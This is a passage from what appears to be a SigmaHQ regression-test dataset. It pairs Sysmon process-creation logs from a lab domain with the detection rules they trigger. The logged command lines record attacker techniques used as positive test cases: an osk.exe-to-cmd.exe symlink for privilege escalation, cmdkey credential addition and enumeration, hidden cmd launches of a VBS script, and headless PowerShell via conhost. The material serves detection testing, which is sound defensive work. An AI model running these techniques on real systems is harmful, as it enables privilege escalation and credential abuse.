17:33:00.989\",\n      \"ProcessGuid\": \"5AA13A44-09CC-68FD-4336-000000004002\",\n      \"ProcessId\": 1060,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\clip.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Clip - copies the data into clipboard\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"clip.exe\",\n      \"CommandLine\": \"clip\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"SHA1=F3F4BE6C6A42072CBB74D05E3EBE285FB24C56CF,MD5=61C8E9DEC5E3AEA798C2862CD4565CCA,SHA256=ABAF131EA0A608072574D7C77A6EE5175CA13E361DE18146A54A78CBD868BFF3,IMPHASH=FFEDF33A1AF6412E26F1F659C12D5FF7\",\n      \"ParentProcessGuid\": \"5AA13A44-08B2-68FD-2136-000000004002\",\n      \"ParentProcessId\": 3204,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_clip_execution/info.yml",
    "content": "id: 4ea9d42e-437f-4c56-8173-bdd8cafd72be\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: ddeff553-5233-4ae9-bbab-d64d2bd634be\n      title: Data Copied To Clipboard Via Clip.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:04:38.507492Z\"\n        }\n      },\n      \"EventRecordID\": 8302863,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:04:38.497\",\n      \"ProcessGuid\": \"5AA13A44-CAE6-68FC-A62F-000000004002\",\n      \"ProcessId\": 7816,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"FileVersion\": \"10.0.20348.3932 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows Command Processor\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"Cmd.Exe\",\n      \"CommandLine\": \"cmd  /c assoc\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cmd_assoc_execution/info.yml",
    "content": "id: 1a0606d6-3470-45e5-aeea-16098357e709\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 3d3aa6cd-6272-44d6-8afc-7e88dfef7061\n      title: Change Default File Association Via Assoc\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:13:54.628884Z\"\n        }\n      },\n      \"EventRecordID\": 8447015,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:13:54.622\",\n      \"ProcessGuid\": \"5AA13A44-CD12-68FC-E62F-000000004002\",\n      \"ProcessId\": 9088,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"FileVersion\": \"10.0.20348.3932 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows Command Processor\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"Cmd.Exe\",\n      \"CommandLine\": \"cmd  /c \\\"dir /s\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cmd_dir_execution/info.yml",
    "content": "id: 952d9279-9d38-4dc6-b32e-4b470cf99fc7\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 7c9340a9-e2ee-4e43-94c5-c54ebbea1006\n      title: File And SubFolder Enumeration Via Dir Command\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cmd_launched_with_hidden_start_flag/5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-04T07:01:44.982629Z\"\n        }\n      },\n      \"EventRecordID\": 27923,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3116,\n          \"ThreadID\": 1656\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-04 07:01:44.963\",\n      \"ProcessGuid\": \"0197231E-31D8-6931-7209-000000000900\",\n      \"ProcessId\": 13752,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"FileVersion\": \"10.0.26100.2454 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows Command Processor\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"Cmd.Exe\",\n      \"CommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\" /c \\\"start /b /min C:\\\\Users\\\\xodih\\\\Music\\\\random.vbs\\\"\",\n      \"CurrentDirectory\": \"C:\\\\WINDOWS\\\\system32\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-BBFB-692F-3C8C-050000000000\",\n      \"LogonId\": \"0x58c3c\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n   
   \"Hashes\": \"MD5=352B525E9C26CB92693899528FE007C2,SHA256=1F1D918EC49E0B7C59B704FF412E1A6E224DA81C08CDA657E1CB482ABAAC146C,IMPHASH=94F3EFC2DF40ECD7229B904540DD83CF\",\n      \"ParentProcessGuid\": \"0197231E-BBFF-692F-8200-000000000900\",\n      \"ParentProcessId\": 5200,\n      \"ParentImage\": \"C:\\\\Windows\\\\explorer.exe\",\n      \"ParentCommandLine\": \"C:\\\\WINDOWS\\\\Explorer.EXE\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cmd_launched_with_hidden_start_flag/info.yml",
    "content": "id: d813db34-f7f0-4713-a419-b491701aa1d1\ndescription: N/A\ndate: 2025-12-04\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d\n      title: Cmd Launched with Hidden Start Flags to Suspicious Targets\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_launched_with_hidden_start_flag/5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:15:18.885132Z\"\n        }\n      },\n      \"EventRecordID\": 8471746,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:15:18.879\",\n      \"ProcessGuid\": \"5AA13A44-CD66-68FC-F12F-000000004002\",\n      \"ProcessId\": 8620,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"FileVersion\": \"10.0.20348.3932 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows Command Processor\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"Cmd.Exe\",\n      \"CommandLine\": \"cmd  /c \\\"mklink C:\\\\Windows\\\\System32\\\\osk.exe C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      
\"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/info.yml",
    "content": "id: 20e20ac5-43f2-40a3-811c-53466d1be222\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: e9b61244-893f-427c-b287-3e708f321c6b\n      title: Potential Privilege Escalation Using Symlink Between Osk and Cmd\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:16:49.968129Z\"\n        }\n      },\n      \"EventRecordID\": 8498306,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:16:49.961\",\n      \"ProcessGuid\": \"5AA13A44-CDC1-68FC-F82F-000000004002\",\n      \"ProcessId\": 608,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"FileVersion\": \"10.0.20348.3932 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows Command Processor\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"Cmd.Exe\",\n      \"CommandLine\": \"cmd  /c \\\"rmdir /s /q malware_folder\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution/info.yml",
    "content": "id: 20a05730-38e8-4889-ab29-0723f185deb0\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 41ca393d-538c-408a-ac27-cf1e038be80c\n      title: Directory Removal Via Rmdir\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:20:36.737647Z\"\n        }\n      },\n      \"EventRecordID\": 8565164,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:20:36.729\",\n      \"ProcessGuid\": \"5AA13A44-CEA4-68FC-1330-000000004002\",\n      \"ProcessId\": 4944,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\cmdkey.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Credential Manager Command Line Utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"cmdkey.exe\",\n      \"CommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmdkey.exe\\\" /generic:TERMSRV/AR-WIN-DC /user:ATTACKRANGE\\\\Administrator /pass:1password2!\",\n      \"CurrentDirectory\": \"C:\\\\tools\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n 
     \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=138CCC1346F17921DC1DF71C88F472ACCC24BC5F,MD5=8B20EBCF5A2C5410B43765B5CEA17E5B,SHA256=F71C08CB7630990EE46338937897C0A83C96DFB8F37DB70322CE7417C01157AA,IMPHASH=03AD7A1AF78BF7A500FB199CABE4C34A\",\n      \"ParentProcessGuid\": \"5AA13A44-0BE6-68FC-A61D-000000004002\",\n      \"ParentProcessId\": 10004,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n      \"ParentCommandLine\": \"powershell  -noprofile\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/info.yml",
    "content": "id: 56a1d988-b883-41dc-ba91-6077c43189df\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: b1ec66c6-f4d1-4b5c-96dd-af28ccae7727\n      title: New Generic Credentials Added Via Cmdkey.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:21:33.116889Z\"\n        }\n      },\n      \"EventRecordID\": 8581967,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:21:33.111\",\n      \"ProcessGuid\": \"5AA13A44-CEDD-68FC-1B30-000000004002\",\n      \"ProcessId\": 7876,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\cmdkey.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Credential Manager Command Line Utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"cmdkey.exe\",\n      \"CommandLine\": \"cmdkey  /list\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"SHA1=138CCC1346F17921DC1DF71C88F472ACCC24BC5F,MD5=8B20EBCF5A2C5410B43765B5CEA17E5B,SHA256=F71C08CB7630990EE46338937897C0A83C96DFB8F37DB70322CE7417C01157AA,IMPHASH=03AD7A1AF78BF7A500FB199CABE4C34A\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cmdkey_recon/info.yml",
    "content": "id: aa97fab6-a83e-4e4f-ad0b-f0cc2a43c24e\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 07f8bdc2-c9b3-472a-9817-5a670b872f53\n      title: Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:38:32.006926Z\"\n        }\n      },\n      \"EventRecordID\": 12090706,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:38:32.006\",\n      \"ProcessGuid\": \"5AA13A44-0B18-68FD-6336-000000004002\",\n      \"ProcessId\": 7232,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\conhost.exe\",\n      \"FileVersion\": \"10.0.20348.4294 (WinBuild.160101.0800)\",\n      \"Description\": \"Console Window Host\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CONHOST.EXE\",\n      \"CommandLine\": \"conhost  --headless powershell calc\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
